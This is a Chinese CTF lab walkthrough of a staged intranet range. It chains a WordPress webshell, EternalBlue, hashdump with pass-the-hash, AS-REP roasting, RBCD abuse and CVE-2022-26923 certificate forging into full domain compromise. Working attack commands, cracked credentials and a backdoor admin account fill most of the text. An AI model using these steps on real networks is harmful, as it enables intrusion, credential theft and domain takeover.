靶标介绍:
该靶场为 2022 第三届网鼎杯决赛内网靶场复盘。完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 flag,分布于不同的靶机。
first-flag
开局一个IP,直接fscan扫描,结果如下
39.101.134.157(icmp) Target 39.101.134.157 is alive
[*] Icmp alive hosts len is: 1
39.101.134.157:22 open
39.101.134.157:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle: http://39.101.134.157 code:200 len:40014 title:XIAORANG.LABwordpress网站,wp-admin直接后台弱口令
admin/123456下载一个插件,可以改代码的
File Manager显示不允许上传,超过最大文件大小了,那就直接改代码
/wp-admin/theme-editor.php?file=404.php&theme=twentytwentyone修改404.php的代码,添加一句话木马
直接访问
http://39.101.134.157//wp-content/themes/twentytwentyone/404.php得到flag1
________ ___ ________ ________ ________ _____
|\ _____\\ \ |\ __ \|\ ____\|\ __ \ / __ \
\ \ \__/\ \ \ \ \ \|\ \ \ \___|\ \ \|\ \|\/_|\ \
\ \ __\\ \ \ \ \ __ \ \ \ __\ \ \\\ \|/ \ \ \
\ \ \_| \ \ \____\ \ \ \ \ \ \|\ \ \ \\\ \ \ \ \
\ \__\ \ \_______\ \__\ \__\ \_______\ \_______\ \ \__\
\|__| \|_______|\|__|\|__|\|_______|\|_______| \|__|
flag01: flag{7c3d1e5e-ce27-4e00-9cb2-d578c1edc4dd}
second-flag
查看网卡情况
(www-data:/var/www/html/wp-content/themes/twentytwentyone) $ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.15.26 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe25:4b7f prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:25:4b:7f txqueuelen 1000 (Ethernet)
RX packets 68201 bytes 88017337 (88.0 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 24081 bytes 6447785 (6.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 850 bytes 75568 (75.5 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 850 bytes 75568 (75.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0直接上传fscan扫描一下网段
(www-data:/tmp) $ ./fscan -h 172.22.15.26/24结果如下
172.22.15.26:22 open
172.22.15.35:445 open
172.22.15.24:445 open
172.22.15.13:445 open
172.22.15.18:445 open
172.22.15.13:88 open
172.22.15.35:139 open
172.22.15.24:139 open
172.22.15.24:3306 open
172.22.15.18:139 open
172.22.15.35:135 open
172.22.15.13:139 open
172.22.15.18:135 open
172.22.15.13:135 open
172.22.15.24:80 open
172.22.15.18:80 open
172.22.15.26:80 open
172.22.15.24:135 open
[*] NetInfo:
[*]172.22.15.24
[->]XR-WIN08
[->]172.22.15.24
[*] NetInfo:
[*]172.22.15.18
[->]XR-CA
[->]172.22.15.18
[*] NetInfo:
[*]172.22.15.35
[->]XR-0687
[->]172.22.15.35
[*] NetBios: 172.22.15.35 XIAORANG\XR-0687
[+] 172.22.15.24 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios: 172.22.15.24 WORKGROUP\XR-WIN08 Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios: 172.22.15.13 [+]DC XR-DC01.xiaorang.lab Windows Server 2016 Standard 14393
[*] NetInfo:
[*]172.22.15.13
[->]XR-DC01
[->]172.22.15.13
[*] 172.22.15.13 (Windows Server 2016 Standard 14393)
[*] NetBios: 172.22.15.18 XR-CA.xiaorang.lab Windows Server 2016 Standard 14393
[*] WebTitle: http://172.22.15.26 code:200 len:39962 title:XIAORANG.LAB
[*] WebTitle: http://172.22.15.18 code:200 len:703 title:IIS Windows Server
[*] WebTitle: http://172.22.15.24 code:302 len:0 title:None 跳转url: http://172.22.15.24/www
[+] http://172.22.15.18 poc-yaml-active-directory-certsrv-detect
[*] WebTitle: http://172.22.15.24/www/sys/index.php code:200 len:135 title:None总结一下
172.22.15.26 入口
172.22.15.24 MS17-010 && web服务是个管理平台-ZDOO 全协同管理平台
172.22.15.35 XR-0687 域成员
172.22.15.18 XR-CA
172.22.15.13 DC一个一个来,首先看到有个永恒之蓝可以先打一下,这里先搭建代理,实现内网后渗透操作
使用Stowaway吧,感觉这个工具的确反响不错。
首先上传linux_x64_agent到靶机,然后在本机或者VPS上上传linux_x64_admin并执行命令启动程序
./linux_x64_admin -l 8856./linux_x64_agent -c VPS:8856即可接收到会话,如下
[*] Starting admin node on port 8856
.-') .-') _ ('\ .-') /' ('-. ('\ .-') /' ('-.
( OO ). ( OO) ) '.( OO ),' ( OO ).-. '.( OO ),' ( OO ).-.
(_)---\_)/ '._ .-'),-----. ,--./ .--. / . --. /,--./ .--. / . --. / ,--. ,--.
/ _ | |'--...__)( OO' .-. '| | | | \-. \ | | | | \-. \ \ '.' /
\ :' '. '--. .--'/ | | | || | | |,.-'-' | || | | |,.-'-' | | .-') /
'..'''.) | | \_) | |\| || |.'.| |_)\| |_.' || |.'.| |_)\| |_.' |(OO \ /
.-._) \ | | \ | | | || | | .-. || | | .-. | | / /\_
\ / | | '' '-' '| ,'. | | | | || ,'. | | | | | '-./ /.__)
'-----' '--' '-----' '--' '--' '--' '--''--' '--' '--' '--' '--'
{ v2.2 Author:ph4ntom }
[*] Waiting for new connection...
[*] Connection from node 39.101.134.157:35632 is set up successfully! Node id is 0
(admin) >>然后使用该node之后开启socks5代理
(admin) >> use 0
(node 0) >> socks 8855
[*] Trying to listen on 0.0.0.0:8855......
[*] Waiting for agent's response......
[*] Socks start successfully!
(node 0) >>然后直接走代理来打永恒之蓝,msf即可
msf6 > search ms17-010
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.22.15.24
这里永恒之蓝试了好多次都是失败,发现配置默认是反向连接,不过应该是不出网,所以需要改成bind_tcp
经常犯这样的错误,害
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.22.15.24 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/U
sing-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows
Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Ser
ver 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R
2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.72.149 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targetset修改一下
set payload windows/x64/meterpreter/bind_tcpmsf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
payload => windows/x64/meterpreter/bind_tcp
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.22.15.24 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/U
sing-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows
Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Ser
ver 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R
2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 172.22.15.24 no The target address
Exploit target:
Id Name
-- ----
0 Automatic Target
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.15.24
exploit但是这里估计是用的这个代理工具的问题,一直显示
[proxychains] Strict chain ... 81.70.241.211:8855 ... 172.22.15.24:4444 <--socket error or timeout!
[proxychains] Strict chain ... 81.70.241.211:8855 ... 172.22.15.24:4444 <--socket error or timeout!
[proxychains] Strict chain ... 81.70.241.211:8855 ... 172.22.15.24:4444 <--socket error or timeout!
[proxychains] Strict chain ... 81.70.241.211:8855 ... 172.22.15.24:4444 <--socket error or timeout!
[proxychains] Strict chain ... 81.70.241.211:8855 ... 172.22.15.24:4444 <--socket error or timeout!所以换成frp来试一试,frp还得是yyds
server
root@VM-16-8-ubuntu:/home/ubuntu/frp_0.51.3_linux_386# ./frps -c frps.ini
2024/07/18 22:33:15 [I] [root.go:204] frps uses config file: frps.ini
2024/07/18 22:33:16 [I] [service.go:206] frps tcp listen on 0.0.0.0:7000
2024/07/18 22:33:16 [I] [root.go:213] frps started successfully
2024/07/18 22:33:18 [I] [service.go:539] [303f5d947098e807] client login info: ip [39.101.134.157:46614] version [0.51.3] hostname [] os [linux] arch [386]
2024/07/18 22:33:18 [I] [tcp.go:81] [303f5d947098e807] [frp] tcp proxy listen port [7001]
2024/07/18 22:33:18 [I] [control.go:497] [303f5d947098e807] new proxy [frp] type [tcp] successclient
(www-data:/tmp) $ chmod +x frpc
(www-data:/tmp) $ ./frpc -c frpc.iniOK,改一下proxychains,还是这个命令
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.15.24
exploit还是报一样的错误
[proxychains] Strict chain ... 81.70.241.211:7001 ... 172.22.15.24:4444 <--socket error or timeout!msf里面需要再设置一次代理
setg proxies socks5:81.70.241.211:7001
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.15.24
exploit嗯抽象,重置了一下靶机就可以了
[+] 172.22.15.24:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.15.24:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.15.24:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (192.168.72.149:43082 -> 81.70.241.211:7001) at 2024-07-18 10:48:39 -0400
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
meterpreter >172.22.15.24 这个存在一个web服务是个管理平台-ZDOO 全协同管理平台,也是个PHP站
admin/123456弱口令登录后台,但是没啥实际服务功能,这个站点和永恒之蓝是一个主机,所以拿下永恒之蓝也就不看这个WEB服务了。
继续刚才说的永恒之蓝的后利用
这里有必要说一下,windows对于msf的命令执行路径是需要双斜杠的\
dir C:\\users\\administrator\\在administrator下发现了flag
meterpreter > dir C:\\users\\administrator\\flag
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Listing: C:\users\administrator\flag
====================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 296 fil 2024-07-18 10:46:08 -0400 flag02.txt得到flag2
meterpreter > cat C:\\users\\administrator\\flag\\flag02.txt
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
__ _ ___ __
/ _| | / _ \/_ |
| |_| | __ _ __ _| | | || |
| _| |/ _` |/ _` | | | || |
| | | | (_| | (_| | |_| || |
|_| |_|\__,_|\__, |\___/ |_|
__/ |
|___/
flag02: flag{1ac1a760-ac0c-45b9-98d0-10f644b4b5c3}也可以直接用msf的download命令,下载到自己指定目录下
download c:/users/administrator/flag/flag02.txt /rootthird-flag
这里的话可以看到我是直接用的msf的会话,没有建立靶机的shell,是因为又出现了刚才的问题,懒得解决了
meterpreter > shell
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 81.70.241.211:7001 ... 127.0.0.1:43315 <--socket error or timeout!
这里下一步其实就是去新建一个用户并加入到用户组里,方便远程桌面连接
C:\Users\Administrator\flag>net user test test123! /add
C:\Users\Administrator\flag>net localgroup administrators test /add当然我是用到msf原生会话hashdump
meterpreter > hashdump
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e52d03e9b939997401466a0ec5a9cbc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::直接走代理连接,利用密文连接密码进行连接
proxychains impacket-psexec administrator@172.22.15.24 -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk如下,成功建立连接
┌──(root㉿kali)-[/home/kali/桌面]
└─# proxychains impacket-psexec administrator@172.22.15.24 -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain ... 81.70.241.211:7001 ... 172.22.15.24:445 ... OK
[*] Requesting shares on 172.22.15.24.....
[*] Found writable share ADMIN$
[*] Uploading file ApswFsGS.exe
[*] Opening SVCManager on 172.22.15.24.....
[*] Creating service PsZP on 172.22.15.24.....
[*] Starting service PsZP.....
[proxychains] Strict chain ... 81.70.241.211:7001 ... 172.22.15.24:445 ... OK
[proxychains] Strict chain ... 81.70.241.211:7001 ... 172.22.15.24:445 ... OK
[!] Press help for extra shell commands
[proxychains] Strict chain ... 81.70.241.211:7001 ... 172.22.15.24:445 ... OK
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Windows\system32> whoami
nt authority\system这个时候再用刚才的命令来建立一个新的用户
C:\Windows\system32> net user test test123! /add
密码不满足密码策略的要求。检查最小密码长度、密码复杂性和密码历史的要求。
请键入 NET HELPMSG 2245 以获得更多的帮助。net user test Abcd1234 /add
net localgroup administrators test /add探测一下端口,看看开3389没,当然这个步骤其实该在刚开始就要先去信息搜集
Nmap scan report for 172.22.15.24
Host is up (0.085s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
49161/tcp open unknown直接用windows连接显示身份验证错误,要求的函数不受支持
解决方案如下
win+R -> gpedit.msc
依次展开“计算机配置”->“管理模板”->“系统”->“凭据分配”设置名称: 加密数据库修正
双击“加密数据库修正”,将状态改为“启用”,保护级别改为“易受攻击”,应用—>确定
接着就可以正常连接远程桌面
桌面phpstudy打开可以看到数据库连接配置信息
root root@#123
zdoo zdoo123开了个phpmyadmin数据库管理
http://172.22.15.24/phpmyadmin/直接用搜集到的信息登录,使用root成功登录
找表里发现有user的表,也就是上边那个永恒之蓝还存在的一个web后台管理平台的信息,导出来这些账密信息,因为这些可能是域用户。
zdoosys_user
通过导出来的信息制作user字典和hash字典,来进行爆破
AS-REP Roasting跑
看一下是否存在有不要求Kerberos 预身份验证的账户
使用 AS-REP Roasting 攻击,尝试获取域用户密码加密的 AS-REP 响应
proxychains4 impacket-GetNPUsers -dc-ip 172.22.15.13 xiaorang.lab/ -usersfile user.txt
或者
proxychains4 impacket-GetNPUsers xiaorang.lab/ -dc-ip 172.22.15.13 -usersfile user.txt -request -outputfile hash.txt得到结果
$krb5asrep$23$huachunmei@XIAORANG.LAB:851c32a00bb708915b394cc3db3c5afc$455aba1dcf716647de66ef0468d2cf1fecf3f5e473f582c70bbd9132e90a09d50944673838be2bff83b6615a29172688610cc7135428f1fa9faa32fdd18cc5444d5ea11790317652245ecdd456578be96ad51fef567be36afe4c811afef8bdac90b5c4c2c68e4954a7cda4321ed9bd4ced55662232e3fd44dc3015d969620c6df152667823bd496e2a6266836fc66a1ec2678be429f29a5efe843bdae71f474a5d8dbad7e2ad13ea19fc34eb96394d7cd07d19358b2b2901c1b8a743197678a8c633ee433af967ce7e567c369ee952f319b83693eb7c900db81f0aecf2b1106011a8b268fc8d513d319d39c5$krb5asrep$23$lixiuying@XIAORANG.LAB:17e675219219b3a515d2847cb31cf827$d2ca78257f5b4aac952735f4440b7cd23ec49e7d962958ceec07ceb1ae4d4791889d218dddb70466b49d2e4ee436d7646aae7392c89b7099a75067dbcf73cd338bf2923d11bba6945822a39028fb57d6d9e9343e497c9600c7c62369eb6fea54610a23d01ac758b8a3f26a1a95f9a91e18728e380bdb334ba5362f659ab679aba466d6ddbc5c39d51dfeef4a97149819de38238d9c1dc3e525a838a7b1a8ed20e0e2df5406d238cd96968bdb7a7744482e16b83e5075a2040254cdf7ce179cb486700c4efad9b4bfe9668b5f876d28dd66e7a4185d5e59de5173d1717d0b514ab9509c91421002c238d65d9eXR-0687AS-ERP Roasting
AS-REP Roasting攻击:
AS-REP Roasting是一种对用户账号进行离线爆破的攻击方式。但是该攻击方式利用比较局限,因为其需要用户账号设置 "Do not require Kerberos preauthentication(不需要kerberos预身份验证) " 。而该属性默认是没有勾选上的。
预身份验证是Kerberos身份验证的第一步(AS_REQ & AS_REP),它的主要作用是防止密码脱机爆破。默认情况下,预身份验证是开启的,KDC会记录密码错误次数,防止在线爆破。关于 AS_REQ & AS_REP:域内认证之Kerberos协议详解。
当关闭了预身份验证后,攻击者可以使用指定用户去请求票据,此时域控不会作任何验证就将 TGT票据 和 该用户Hash加密的Session Key返回。因此,攻击者就可以对获取到的 用户Hash加密的Session Key进行离线破解,如果破解成功,就能得到该指定用户的密码明文。
AS-REP Roasting攻击条件
域用户设置了 “Do not require Kerberos preauthentication(不需要kerberos预身份验证)”
需要一台可与KDC进行通信的主机/用户
进行攻击
hashcat爆破一下
终端输入wordlists
然后/usr/share/wordlists/就会有rockyou.txt
hashcat -a 0 -m 18200 --force '$krb5asrep$23$huachunmei@XIAORANG.LAB:eff58abecde01228d594ff0755236c78$59c759e6970e614d393f4e812922a996c2fc1c16b08607b569f2a1fda496dca9e575a67b343a70128c03b9ad6708c6fe92a38f32a113af67408f2550295df3adf190e62de5a733d105ca8a48aaa705a1c6df633005fdec2559d7c718c22b6ff94a656a4b09e7ed60db6becd4e073ab6d9236690f7dedf6641f3c6b18323f014992fe2f3aed745fa2951d9f08dd79bd88467eac5c6c1e1ba41228b302969c70f3dce14a4e4909ed492632d14e3b822089f5e79a345dbd9e12ec7580e8ada954b0cb8fbf9dd80af7f423db697d1a7a0013dd5f3d3403be2e17d5029461a7e10c55d223513928323bf80b948e95' rockyou.txt得到
lixiuying@xiaorang.lab/winniethepooh
huachunmei@xiaorang.lab/1qaz2wsx172.22.15.35是存在一个漏洞叫Active Directory 域服务特权提升漏洞
CVE-2022–26923
试一下看哪个可以登录3389
┌──(root㉿kali)-[~]
└─# proxychains -q crackmapexec smb 172.22.15.0/24 -u 'lixiuying' -p 'winniethepooh'
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing WINRM protocol database
[*] Initializing SMB protocol database
[*] Initializing LDAP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing SSH protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB 172.22.15.18 445 XR-CA [*] Windows Server 2016 Standard 14393 x64 (name:XR-CA) (domain:xiaorang.lab) (signing:False) (SMBv1:True)
SMB 172.22.15.35 445 XR-0687 [*] Windows 10.0 Build 20348 x64 (name:XR-0687) (domain:xiaorang.lab) (signing:False) (SMBv1:False)
SMB 172.22.15.24 445 XR-WIN08 [*] Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (name:XR-WIN08) (domain:XR-WIN08) (signing:False) (SMBv1:True)
SMB 172.22.15.13 445 XR-DC01 [*] Windows Server 2016 Standard 14393 x64 (name:XR-DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:True)
SMB 172.22.15.18 445 XR-CA [+] xiaorang.lab\lixiuying:winniethepooh
SMB 172.22.15.35 445 XR-0687 [+] xiaorang.lab\lixiuying:winniethepooh
SMB 172.22.15.24 445 XR-WIN08 [-] XR-WIN08\lixiuying:winniethepooh STATUS_LOGON_FAILURE
SMB 172.22.15.13 445 XR-DC01 [+] xiaorang.lab\lixiuying:winniethepooh远程登录172.22.15.35,第二个可以成功登录域环境
RBCD和传统的约束委派的区别就是,约束是在资源服务器上进行配置的,传统的约束委派中,资源服务器只能被动的接受委派,是否能够委派到资源服务器由委派服务器进行控制。
RBCD可以通过msDS-AllowedToActOnBehalfOfOtherIdentity属性来控制委派服务器是否能够委派任意用户来访问自己。
法一
本地kali修改hosts
echo "172.22.15.35 XR-0687.xiaorang.lab" >> /etc/hosts添加用户
proxychains -q impacket-addcomputer xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'hacker1$' -computer-pass 'Admin@123'┌──(root㉿kali)-[~]
└─# proxychains -q impacket-addcomputer xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'hacker1$' -computer-pass 'Admin@123'
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Successfully added machine account hacker1$ with password Admin@123.攻击
proxychains -q impacket-rbcd xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'hacker1$'┌──(root㉿kali)-[~]
└─# proxychains -q impacket-rbcd xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'hacker1$'
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] hacker1$ can now impersonate users on XR-0687$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] hacker1$ (S-1-5-21-3745972894-1678056601-2622918667-1147)创建票据
proxychains -q impacket-getST xiaorang.lab/'hacker1$':'Admin@123' -dc-ip 172.22.15.13 -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator┌──(root㉿kali)-[~]
└─# proxychains -q impacket-getST xiaorang.lab/'hacker1$':'Admin@123' -dc-ip 172.22.15.13 -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache导入票据
export KRB5CCNAME=Administrator.ccache┌──(root㉿kali)-[~]
└─# export KRB5CCNAME=Administrator.ccache无密码连接
proxychains -q impacket-psexec -k -no-pass -dc-ip 172.22.15.13 administrator@XR-0687.xiaorang.lab -codec gbk┌──(root㉿kali)-[~]
└─# proxychains -q impacket-psexec -k -no-pass -dc-ip 172.22.15.13 administrator@XR-0687.xiaorang.lab -codec gbk
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on XR-0687.xiaorang.lab.....
[*] Found writable share ADMIN$
[*] Uploading file dTCaOTUw.exe
[*] Opening SVCManager on XR-0687.xiaorang.lab.....
[*] Creating service SLTU on XR-0687.xiaorang.lab.....
[*] Starting service SLTU.....
[!] Press help for extra shell commands
Microsoft Windows [版本 10.0.20348.1668]
(c) Microsoft Corporation。保留所有权利。
C:\Windows\system32> ipconfig
Windows IP 配置
以太网适配器 以太网 2:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::229d:267f:4c09:8690%7
IPv4 地址 . . . . . . . . . . . . : 172.22.15.35
子网掩码 . . . . . . . . . . . . : 255.255.0.0
默认网关. . . . . . . . . . . . . : 172.22.255.253
C:\Windows\system32> whoami
nt authority\systemC:\Users\Administrator> cd flag
C:\Users\Administrator\flag> type flag03.txt
__ _ __ ____
/ _| |__ _ __ _ / \__ /
| _| / _` / _` | () |_ \
|_| |_\__,_\__, |\__/___/
|___/
flag03: flag{98872a9a-79c0-4961-ad5d-3bbdde7830e4}法二
使用 bloodhound 分析域内环境:
安装Neo4j数据库: apt-get install neo4j
fourth-flag
Active Directory 域权限提升漏洞(CVE-2022-26923),这个最开始fscan也扫到了
echo "172.22.15.13 XR-DC01.xiaorang.lab" >> /etc/hosts需要用到这个
https://github.com/ly4k/Certipy/python set.py install┌──(root㉿kali)-[~/Certipy]
└─# proxychains -q certipy account create -user 'hacker2$' -pass 'Admin@123' -dns XR-DC01.xiaorang.lab -dc-ip 172.22.15.13 -u lixiuying -p 'winniethepooh'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Creating new account:
sAMAccountName : hacker2$
unicodePwd : Admin@123
userAccountControl : 4096
servicePrincipalName : HOST/hacker2
RestrictedKrbHost/hacker2
dnsHostName : XR-DC01.xiaorang.lab
[*] Successfully created account 'hacker2$' with password 'Admin@123'┌──(root㉿kali)-[~/Certipy]
└─# proxychains -q certipy req -u 'hacker2$@xiaorang.lab' -p 'Admin@123' -ca 'xiaorang-XR-CA-CA' -target 172.22.15.18 -template 'Machine'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 8
[*] Got certificate with DNS Host Name 'XR-DC01.xiaorang.lab'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'xr-dc01.pfx'┌──(root㉿kali)-[~/Certipy]
└─# proxychains -q certipy auth -pfx xr-dc01.pfx -dc-ip 172.22.15.13
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: xr-dc01$@xiaorang.lab
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)转换证书格式,密码为空密码即可
┌──(root㉿kali)-[~/Certipy]
└─# openssl pkcs12 -in xr-dc01.pfx -nodes -out test.pem
Enter Import Password:
┌──(root㉿kali)-[~/Certipy]
└─# openssl rsa -in test.pem -out test.key
writing RSA key
┌──(root㉿kali)-[~/Certipy]
└─# openssl x509 -in test.pem -out test.crt下边需要这个
https://github.com/AlmondOffSec/PassTheCert/继续
┌──(root㉿kali)-[~/Certipy]
└─# ls
build certipy_ad.egg-info customqueries.json LICENSE setup.py test.key xr-dc01.pfx
certipy Certipy.spec dist README.md test.crt test.pem
┌──(root㉿kali)-[~/Certipy]
└─# proxychains -q passthecert.py -action whoami -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13
Impacket v0.11.0 - Copyright 2023 Fortra
[*] You are logged in as: XIAORANG\XR-DC01$proxychains -q passthecert.py -action whoami -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13
proxychains -q passthecert.py -action write_rbcd -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'hacker2$'
proxychains -q impacket-getST xiaorang.lab/'hacker2$':'Admin@123' -dc-ip 172.22.15.13 -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator
export KRB5CCNAME=Administrator.ccache
proxychains -q impacket-psexec -k -no-pass -dc-ip 172.22.15.13 administrator@XR-DC01.xiaorang.lab -codec gbk[*] You are logged in as: XIAORANG\XR-DC01$
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Accounts allowed to act on behalf of other identity:
[*] hacker2$ (S-1-5-21-3745972894-1678056601-2622918667-1148)
[*] hacker2$ can already impersonate users on XR-DC01$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*] hacker2$ (S-1-5-21-3745972894-1678056601-2622918667-1148)
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
